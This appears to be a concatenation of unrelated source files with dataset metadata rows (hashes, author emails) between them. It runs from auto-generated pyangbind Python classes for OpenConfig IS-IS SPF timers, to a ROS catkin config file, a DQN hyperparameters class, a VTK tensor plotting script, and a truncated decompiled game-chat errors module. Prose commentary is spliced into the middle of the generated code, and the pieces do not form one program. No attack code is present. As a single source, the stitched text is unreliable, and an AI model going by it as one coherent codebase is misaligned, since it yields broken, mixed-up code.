except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
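Every leaf in the class above is wrapped in a `RestrictedClassType` whose range string is `'0..18446744073709551615'`, i.e. the full uint64 range, with `spf-hold-interval` alone carrying a default of 5000 ms. A pure-Python sketch of what that restriction enforces — the function name and signature are illustrative, not pyangbind's actual `RestrictedClassType` API:

```python
UINT64_MAX = 18446744073709551615  # 2**64 - 1, matching the generated range string

def make_uint64(value, default=None):
    """Sketch of the uint64 range check applied to the SPF timer leaves."""
    if value is None:
        return default  # leaf left unset falls back to its YANG default, if any
    iv = int(value)
    if not 0 <= iv <= UINT64_MAX:
        raise ValueError("value must be compatible with uint64")
    return iv

# spf-hold-interval has a default of 5000 ms; the other two leaves have no default
spf_hold_interval = make_uint64(None, default=5000)
spf_first_interval = make_uint64(200)
```

This mirrors why the generated setters catch `TypeError`/`ValueError` and re-raise with the "must be of a type compatible with uint64" message: any out-of-range or non-integer input fails the wrapped construction.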
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timers configuration.
"""
__slots__ = ('_path_helper', '_extmethods', '__spf_hold_interval','__spf_first_interval','__spf_second_interval',)
_yang_name = 'config'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['network-instances', 'network-instance', 'protocols', 'protocol', 'isis', 'global', 'timers', 'spf', 'config']
def _get_spf_hold_interval(self):
"""
Getter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
YANG Description: SPF Hold Down time interval in milliseconds.
"""
return self.__spf_hold_interval
def _set_spf_hold_interval(self, v, load=False):
"""
Setter method for spf_hold_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_hold_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_hold_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_hold_interval() directly.
YANG Description: SPF Hold Down time interval in milliseconds.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_hold_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_hold_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_hold_interval(self):
self.__spf_hold_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64)(5000), is_leaf=True, yang_name="spf-hold-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_first_interval(self):
"""
Getter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
return self.__spf_first_interval
def _set_spf_first_interval(self, v, load=False):
"""
Setter method for spf_first_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_first_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_first_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_first_interval() directly.
YANG Description: Time interval in milliseconds between the
detection of topology change and when the SPF algorithm runs.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_first_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_first_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_first_interval(self):
self.__spf_first_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-first-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
def _get_spf_second_interval(self):
"""
Getter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
return self.__spf_second_interval
def _set_spf_second_interval(self, v, load=False):
"""
Setter method for spf_second_interval, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config/spf_second_interval (uint64)
If this variable is read-only (config: false) in the
source YANG file, then _set_spf_second_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_spf_second_interval() directly.
YANG Description: Time interval in milliseconds between the first and second
SPF calculation.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """spf_second_interval must be of a type compatible with uint64""",
'defined-type': "uint64",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)""",
})
self.__spf_second_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_spf_second_interval(self):
self.__spf_second_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="spf-second-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=True)
spf_hold_interval = __builtin__.property(_get_spf_hold_interval, _set_spf_hold_interval)
spf_first_interval = __builtin__.property(_get_spf_first_interval, _set_spf_first_interval)
spf_second_interval = __builtin__.property(_get_spf_second_interval, _set_spf_second_interval)
_pyangbind_elements = OrderedDict([('spf_hold_interval', spf_hold_interval), ('spf_first_interval', spf_first_interval), ('spf_second_interval', spf_second_interval), ])
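The setter above follows the usual pyangbind shape: try to coerce the incoming value into a range-restricted uint64 via YANGDynClass/RestrictedClassType, and raise a structured ValueError when coercion fails. The sketch below is not the real pyangbind machinery, only a minimal stand-in for the range check it performs:

```python
def coerce_uint64(value):
    """Minimal stand-in for the uint64 restriction used by the setter above:
    coerce to int and enforce the range 0..18446744073709551615."""
    err = {
        'error-string': 'value must be of a type compatible with uint64',
        'defined-type': 'uint64',
    }
    try:
        v = int(value)
    except (TypeError, ValueError):
        raise ValueError(err)
    if not 0 <= v <= 18446744073709551615:
        raise ValueError(err)
    return v
```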
| [
"zblevins@netflix.com"
] | zblevins@netflix.com |
6e5c7d4574ac6bdf771974fca13d24252f6fbbfe | e5ba55ac56d2d07aeebd7253fbe5d186196c9a52 | /catkin_ws/catkin_ws/build/rosserial/rosserial_server/catkin_generated/pkg.installspace.context.pc.py | ae10992ff46064e55de2240a2ca888d8f0938951 | [] | no_license | masiro97/darrsm | 5305a3e7c1fba2635a4925b9e079f45b40162862 | b881d00427d2af5d75ca509a191e57f2890e1ece | refs/heads/master | 2021-05-10T21:57:17.760536 | 2018-01-20T15:13:56 | 2018-01-20T15:13:56 | 111,084,804 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/cun/catkin_ws/install/include".split(';') if "/home/cun/catkin_ws/install/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;rosserial_msgs;std_msgs;topic_tools".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rosserial_server"
PROJECT_SPACE_DIR = "/home/cun/catkin_ws/install"
PROJECT_VERSION = "0.7.6"
| [
"estrk7120@gmail.com"
] | estrk7120@gmail.com |
2fb1b577624a5c8248e2d3dda1345033e30fd705 | dbe7731552d8e6d1e63cc0f2e27d3810cc61f350 | /hyper_paras/hp_dqn_2015.py | d4c5e2d826930dfa598be045d574d07259694b32 | [] | no_license | ZhangRui111/rl_breakout_tf | 6bb3f57f2b1d52f196323916393234e8abb990ac | 04f259cd3c32eaffbad87fe1035b0f87c96127b0 | refs/heads/master | 2020-04-08T19:24:16.018734 | 2018-12-18T02:42:56 | 2018-12-18T02:42:56 | 159,653,713 | 1 | 1 | null | 2018-12-18T02:42:57 | 2018-11-29T11:12:04 | Python | UTF-8 | Python | false | false | 190 | py | from hyper_paras.base_hyper_paras import BaseHyperparameters
class Hyperparameters(BaseHyperparameters):
def __init__(self):
super().__init__()
self.model = 'dqn_2015'
| [
"zhangruisg111@163.com"
] | zhangruisg111@163.com |
6943c6920b94ac55fc64ba3c743795f09a5b7748 | 33836016ea99776d31f7ad8f2140c39f7b43b5fe | /fip_collab/2015_01_29_BC_eval/main.py | 9afe65371e8a594387bdee14b3c79e9fe46bed0a | [] | no_license | earthexploration/MKS-Experimentation | 92a2aea83e041bfe741048d662d28ff593077551 | 9b9ff3b468767b235e7c4884b0ed56c127328a5f | refs/heads/master | 2023-03-17T23:11:11.313693 | 2017-04-24T19:24:35 | 2017-04-24T19:24:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,530 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 17 16:46:35 2014
@author: nhpnp3
"""
import functions as rr
import numpy as np
import matplotlib.pyplot as plt
filename = 'Results_Ti64_Dream3D_XYdirLoad_210microns_9261el_AbqInp_AnisoLE_005_data_v2_01.vtk'
el = 21
tensor_ID = 1
## The tensorID determines the type of tensor data read from the .vtk file
## if tensorID == 0, we read the stress tensor
## if tensorID == 1, we read the strain tensor
## if tensorID == 2, we read the plastic strain tensor
compl = ['11','22','33','12','23','31']
compd = {'11':0,'22':4,'33':8,'12':1,'23':5,'31':6}
r_real = np.zeros([np.size(compl),el,el,el])
c = 0
for comp in compl:
compp = compd[comp]
r_temp = rr.read_vtk_tensor(filename = filename, tensor_id = tensor_ID, comp = compp)
r_real[c,...] = r_temp.reshape([el,el,el])
    print comp
print np.mean(r_real[c,...])
c += 1
euler = rr.read_vtk_vector(filename).reshape([3,el,el,el])
for dispcomp in xrange(np.size(compl)):
plt.close(dispcomp)
## Plot slices of the response
plt.figure(num=dispcomp,figsize=[14,6])
plt.subplot(231)
ax = plt.imshow(euler[0,0,:,:], origin='lower', interpolation='none',
cmap='jet')
plt.colorbar(ax)
plt.title('Microstructure, slice 0')
plt.subplot(232)
ax = plt.imshow(euler[0,np.floor(0.5*el),:,:], origin='lower', interpolation='none',
cmap='jet')
plt.colorbar(ax)
plt.title('Microstructure, slice %s' % np.floor(0.5*el))
plt.subplot(233)
ax = plt.imshow(euler[0,el-1,:,:], origin='lower', interpolation='none',
cmap='jet')
plt.colorbar(ax)
plt.title('Microstructure, slice %s' % (el-1))
dmin = np.min(r_real[dispcomp,...])
dmax = np.max(r_real[dispcomp,...])
plt.subplot(234)
ax = plt.imshow(r_real[dispcomp,0,:,:], origin='lower', interpolation='none',
cmap='jet', vmin=dmin, vmax=dmax)
plt.colorbar(ax)
plt.title('Response, slice 0')
plt.subplot(235)
ax = plt.imshow(r_real[dispcomp,np.floor(0.5*el),:,:], origin='lower', interpolation='none',
cmap='jet', vmin=dmin, vmax=dmax)
plt.colorbar(ax)
plt.title('Response, slice %s' % np.floor(0.5*el))
plt.subplot(236)
ax = plt.imshow(r_real[dispcomp,el-1,:,:], origin='lower', interpolation='none',
cmap='jet', vmin=dmin, vmax=dmax)
plt.colorbar(ax)
plt.title('Response, slice %s' % (el-1)) | [
"noahhpaulson@gmail.com"
] | noahhpaulson@gmail.com |
60a813a4f05609691d978440ce055ad549e189da | 59de7788673ade984b9c9fbc33664a7cbdba67d3 | /res/scripts/client/messenger/proto/bw_chat2/errors.py | 08901cc5ca868928a6c33929c34e99ea139ac423 | [] | no_license | webiumsk/WOT-0.9.15-CT | 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | fbd194fbaa6bdece51c7a68fc35bbb5257948341 | refs/heads/master | 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 7,166 | py | # 2016.05.01 15:25:05 Střední Evropa (letní čas)
# Embedded file name: scripts/client/messenger/proto/bw_chat2/errors.py
from gui.Scaleform.locale.MESSENGER import MESSENGER as I18N_MESSENGER
from gui.Scaleform.locale.INGAME_GUI import INGAME_GUI as I18N_INGAME_GUI
from helpers import i18n, html
from helpers.time_utils import makeLocalServerTime
from messenger.proto.interfaces import IChatError
from messenger.proto.shared_errors import ChatCoolDownError, ClientActionError, I18nActionID, I18nErrorID, ChatBanError
from messenger_common_chat2 import MESSENGER_ACTION_IDS as _ACTIONS
from messenger_common_chat2 import MESSENGER_ERRORS as _ERRORS
from messenger_common_chat2 import MESSENGER_LIMITS as _LIMITS
def getChatActionName(actionID):
actionName = _ACTIONS.getActionName(actionID)
i18nKey = I18N_MESSENGER.chat_action(actionName)
if i18nKey is not None:
i18nName = i18n.makeString(i18nKey)
else:
i18nName = actionName
return i18nName
def getBattleCommandExample(msgText):
i18nKey = I18N_INGAME_GUI.chat_example(msgText)
if i18nKey is not None:
i18nName = html.escape(i18n.makeString(i18nKey))
else:
i18nName = msgText
return i18nName
def getChatErrorMessage(errorID, kwargs):
errorName = _ERRORS.getErrorName(errorID)
i18nKey = I18N_MESSENGER.chat_error(errorName)
if i18nKey is not None:
msg = i18n.makeString(i18nKey, **kwargs)
else:
msg = '{0}\\{1}'.format(errorName, kwargs)
return msg
class _BWChat2I18nError(I18nErrorID):
